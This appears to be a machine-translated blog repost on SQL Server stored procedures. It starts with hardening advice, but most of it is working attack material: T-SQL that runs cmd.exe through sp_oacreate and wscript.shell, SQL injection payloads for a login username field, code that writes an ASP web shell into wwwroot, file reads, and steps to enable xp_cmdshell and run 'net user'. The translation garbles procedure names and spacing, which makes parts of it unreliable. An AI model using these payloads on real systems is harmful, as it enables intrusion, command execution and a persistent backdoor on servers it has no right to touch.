Dangerous SQL server! (From: bytes /)

Perform major operations on the stored procedure, and exercise caution when calling the account to extend the stored procedure. In fact, most applications do not use much system stored procedures. SQL Server's multi-system stored procedures are only used to meet the needs of users. Therefore, delete unnecessary stored procedures, because the stored procedures of some systems can be easily exploited to escalate permissions or destroy them. If you do not need to extend the Stored Procedure xp_mongoshell, remove it. Use this SQL statement:

Use master

_ Dropextendedproc 'xp _ Your shell'

Xp_mongoshell is the best way to enter the operating system and a large backdoor left by the database to the operating system. If you need this stored procedure, use this statement to restore it.

Sp_addextendedproc 'xp _ external shell', 'sqlsql70. dll'

If you do not need to discard the OLE Automatic stored procedure (which may cause some features in the manager to be unavailable), these procedures include:

Sp_oacreate sp_oadestroy sp_oageterrorinfo sp_oagetproperty

Sp_oamethod sp_oasetproperty sp_oastop

Remove unnecessary stored procedures for registry access. The Registry Stored Procedures can even read the password of the Operating System Administrator as follows:

Xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumvalues

Xp_regread xp_regremovemultistring xp_regwrite

There are also some other extended stored procedures that you 'd better check. When processing the stored procedure, check to avoid damage to the database or application.

 

 

 

 

Sp_oacreate: Run CMD and display echo. wscript. Shell and scripting. FileSystemObject are required to be available.

Sp_oacreate
Create an OLE object instance on a Microsoft SQL server instance.
Syntax
Sp_oacreate progid, | CLSID,
Objecttoken output
[, Context]
---------------------------------------------------------------------
Sp_oagetproperty
Obtains the attribute value of an OLE object.
Syntax
Sp_oagetproperty objecttoken,
Propertyname
[, Propertyvalue output]
[, Index...]
---------------------------------------------------------------------
Sp_oamethod
Call the method of the OLE object.
Syntax
Sp_oamethod objecttoken,
Methodname
[, Returnvalue output]
[, [@ Parametername =] parameter [Output]
[... N]
---------------------------------------------------------------------
Ideas:
Create a wscript on SQL Server first. shell, call its run method, output the execution result of cmd.exe to a file, and then create a scripting. fileSystemObject creates a textstream object, reads the characters in the temporary file, and adds one row to a temporary table.
The following are the corresponding SQL statements:

Create Table mytmp (Info varchar (400), Id identity (1, 1) not null)
Declare @ shell int
Declare @ FSO int
Declare @ file int
Declare @ isend bit
Declare @ out varchar (400)
Exec sp_oacreate 'wscript. shell', @ shell output
Exec sp_oamethod @shell,'run', null,'cmd.exe/C dir C:/> C:/temp.txt ', '0', 'true'
-- Note that the run parameter true indicates the result of waiting for the program to run. This parameter must be used for long-time commands similar to ping.

Exec sp_oacreate 'scripting. FileSystemObject ', @ FSO output
Exec sp_oamethod @ FSO, 'opentextfile', @ file out, 'c:/temp.txt'
-- Because the FSO opentextfile method returns a textstream object, @ file is an object token.

While @ shell> 0
Begin
Exec sp_oamethod @ file, 'readline', @ out
Insert into mytmp (Info) values (@ out)
Exec sp_oagetproperty @ file, 'endofstream', @ isend out
If @ isend = 1 break
Else continue
End

Drop table mytmp

Note:
If you use this method during the injection test, there cannot be so many line breaks, you must combine them into a line, and each statement is separated by a space character.
Bytes -------------------------------------------------------------------------------------------------------------------
(1) In this example, an instance of notepad is created using the 'wscript. shell' object:
Wscript. Shell example
Declare @ o int
Exec sp_oacreate 'wscript. shell', @ o out
Exec sp_oamethod @o,'run', null,'notepad.exe'
We can execute it by specifying it after the User Name:
Username: '; declare @ o int exec sp_oacreate 'wscript. shell', @ o out exec sp_oamethod @o,'run', null,'notepad.exe '--

(2) This example uses the 'scripting. filesystemobobject' object to read a known text file:
-- Scripting. FileSystemObject example-read a Known File
Declare @ o int, @ F int, @ t int, @ RET int
Declare @ line varchar (8000)
Exec sp_oacreate 'scripting. FileSystemObject ', @ o out
Exec sp_oamethod @ o, 'opentextfile', @ F out, 'c:/boot. ini ', 1
Exec @ ret = sp_oamethod @ F, 'readline', @ line out
While (@ ret = 0)
Begin
Print @ line
Exec @ ret = sp_oamethod @ F, 'readline', @ line out
End

 

(3) In this example, any command that can be submitted is created:
-- Scripting. FileSystemObject example-create a 'run this '. asp file
Declare @ o int, @ F int, @ t int, @ RET int
Exec sp_oacreate 'scripting. FileSystemObject ', @ o out
Exec sp_oamethod @ o, 'createtextfile', @ F out, 'c:/inetpub/wwwroot/Foo. asp ', 1
Exec @ ret = sp_oamethod @ F, 'writeline ', null,' <% set O = server. createobject ("wscript. shell "): O. run (request. querystring ("cmd") %>'
It should be noted that if the running environment is on win NT4 + IIS4 platform, the command for running the program through this program is run with the system permission. In iis5, it runs with a relatively low permission iwam_xxxaccount.

(4) These examples describe the applicability of this technology. It can use the 'speech. voicetext 'object to cause the voice of the SQL Server:
Declare @ o int, @ RET int
Exec sp_oacreate 'speech. voicetext ', @ o out
Exec sp_oamethod @ o, 'Register ', null, 'foo', 'bar'
Exec sp_oasetproperty @ o, 'speed', 150
Exec sp_oamethod @ o, 'speak', null, 'All your sequel servers are belong to, us', 528
Waitfor delay '00: 00: 05'
In our hypothetical example, we can execute it after the user name (note that this example not only injects a script, but also logs on to the application with the admin permission ):
Username: admin'; declare @ o int, @ RET int exec sp_oacreate 'speech. voicetext ', @ o out exec sp_oamethod @ o, 'Register', null, 'foo', 'bar' exec sp_oasetproperty @ o, 'speed', 150 exec sp_oamethod @ O, 'speak', null, 'All your sequel servers are belong to us', 528 waitfor delay' 00: 00: 05 '--

 

 

 

 

I (lslxdx) sorted out the statements that can be executed by xp_cmdshell and sp_aomethod. It will be useful to everyone (the following statement is not risky ):

 

-- Open oamethod --

Sp_configure 'show advanced options', 1;

Go

Reconfigure;

Go

Sp_configure 'ole automation procedures ', 1;

Go

Reconfigure;

Go

 

-- Start executing oamethod --

Declare @ shell int

Declare @ FSO int

Declare @ file int

Declare @ isend bit

Declare @ out varchar (400)

Exec sp_oacreate 'wscript. shell', @ shell output

Exec sp_oamethod @shell,'run', null,'cmd.exe/C net user', '0', 'true'

Go

 

-- Close oamethod if it's okay --

Sp_configure 'show advanced options', 1;

Go

Reconfigure;

Go

Sp_configure 'ole automation procedures ', 0;

Go

Reconfigure;

Go

 

 

-- Open xp_cmdshell --

Sp_configure 'show advanced options', 1;

Go

Reconfigure;

Go

Sp_configure 'xp _ cmdshell', 1;

Go

Reconfigure;

Go

 

-- Use the doscommand to display all user names on the computer --

Exec xp_cmdshell 'net user'

Go

 

 

-- Close xp_mongoshell if it's okay --

Sp_configure 'show advanced options', 1;

Go

Reconfigure;

Go

Sp_configure 'xp _ Your shell', 0;

Go

Reconfigure;

Go